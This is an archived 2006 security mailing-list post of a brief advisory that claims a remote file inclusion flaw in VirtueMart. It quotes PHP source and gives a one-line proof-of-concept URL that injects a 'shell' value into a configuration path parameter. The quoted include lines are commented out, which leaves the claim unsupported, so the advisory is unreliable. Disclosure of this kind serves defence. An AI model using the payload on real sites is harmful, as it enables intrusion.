Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: VirtueMart

VirtueMart

From: <t3rr0r1st_at_aria-security.net>
Date: 9 Sep 2006 00:41:16 -0000
('binary' encoding is not supported, stored as-is) #Aria-Security.net Advisory
#Discovered by: Dr.T3rr0r1st
#< www.Aria-security.net >
#Gr33t to: The-0utl4w & A.u.r.a & R_at_1D3N & Smok3r
#-----------------------------------------------------------
Software: VirtueMart
Link: virtumart.net
Attack method: Remote File Inclusion

Source :
//Set up the mailer to infor Warehouse of validated order
    //require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php');
    //$mail = new mosPHPMailer();
    //$mail->PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/';
    //$mail->SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/');

Proof of Concept:
http://site.com/%5bpath%5d/worldpay_notify.php?mosConfig_absolute_path=shell

Solution
contact me: Advisory_at_Aria-Security.net
Received on Sep 11 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos